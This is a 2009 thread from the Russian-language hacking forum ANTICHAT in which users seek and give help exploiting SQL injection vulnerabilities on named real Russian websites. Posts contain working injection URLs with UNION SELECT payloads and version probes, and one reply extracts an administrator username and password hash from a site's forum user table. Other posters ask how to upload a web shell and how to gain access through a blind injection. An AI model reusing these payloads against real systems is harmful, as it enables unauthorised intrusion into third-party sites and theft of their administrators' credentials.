ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.07.2009, 22:01
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Помогите с MS SQL инъектом. http://www.gastronom.ru/rcp_search.aspx?simple=0&t=&k=&s=&tm=&d=&tc=&c=&v= &rr=&f=&ms=&title=1%27+or+1%3d%28%40%40version%29--&ion=
собственно, http://www.gastronom.ru/ тут в поле поиска по сайты проходит инъект, если ввести в поле поиска : 1' or 1=(@@version)-- - мы получим данные сервера. я не могу найти поле с пасом админа, почти все поля перебрал, помогите плиз.
|
|
|
01.08.2009, 12:04
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 4
Провел на форуме:
11163
Репутация:
0
|
|
http://dengi-info.com/news/?top=top&nid=-4031+union+select+1,2,3,4,5,6,version(),8,9
вот дошел до сюда раньше не работал с этой версией scema сдесь не прокатывает
подскажите как мне выйти на таблицу пользователей
|
|
|
|
01.08.2009, 12:23
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
darkkrad, используй SIPT4 программу.
пробруть по словрю таблиц и колонок, всё будет Ok 
*учись юзать софт, пригодится. |
|
|
|
17.08.2009, 10:08
|
|
Познающий
Регистрация: 11.07.2009
Сообщений: 58
Провел на форуме:
231064
Репутация:
6
|
|
посмотрите:
http://lyrics.intbel.ru/?rubrica=-1+union+select+null,null,null,null,null,null--
если ставляю цифры то пишет еще больше ошибок
иньекция вроде есть, а вот заюзать её никак не получается  |
|
|
|
17.08.2009, 11:12
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
PostgreSQL
http://lyrics.intbel.ru/index.php?rubrica=3+union+select+null,null,version (),null,null,null--
вывод внизу
Код:
PostgreSQL 8.2.5 on i586-mandriva-linux-gnu, compiled by GCC i586-mandriva-linux-gnu-gcc (GCC) 4.2.2 20070909 (prerelease) (4.2.2-0.RC.1mdv2008.0)
|
|
|
|
03.09.2009, 09:51
|
|
Участник форума
Регистрация: 12.11.2008
Сообщений: 146
Провел на форуме:
592199
Репутация:
21
|
|
Помогите! Как мне шелл залить!
http://dvgu.ru/news/?r_id=&s_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10/*&year=2009&month=
тут на сайте еще форум есть Burning Board 2.3.6
http://dvgu.ru/forum/
Через эту скуди видно таблици этого форума но Login и pass админа я так и не нашел!
Посмотрите че можно с этим сделать? Заранее спасибо! |
|
|
|
03.09.2009, 10:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 denjf
http://dvgu.ru/news/?r_id=&s_id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELE CT/**/CONCAT_WS(0x3a,username,password)/**/FROM/**/dvgu.bb2_users/**/LIMIT/**/0,1)),0x71),0x71),9,10/*&year=2009&month=
admin:ff7bac25cef086839a695d23770bd5b2
Последний раз редактировалось Gorev; 03.09.2009 в 10:27..
|
|
|
|
16.10.2009, 20:30
|
|
Новичок
Регистрация: 13.06.2007
Сообщений: 1
Провел на форуме:
436987
Репутация:
0
|
|
Нашёл sql-уязвимость:
PHP код:
http://mayka-market.ru/index.php?id_catalog=1'
и собственно застрял на этом |
|
|
|
20.10.2009, 12:34
|
|
Новичок
Регистрация: 23.08.2009
Сообщений: 17
Провел на форуме:
112049
Репутация:
5
|
|
Stefan. вроде как никак не использовать её
|
|
|
|
25.10.2009, 15:02
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
Провел на форуме:
60216
Репутация:
0
|
|
http://www.weller.ru/?id=22&cid=28
здесь есть блинд инжекшн .. необходимо доступ к сайту получить )
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
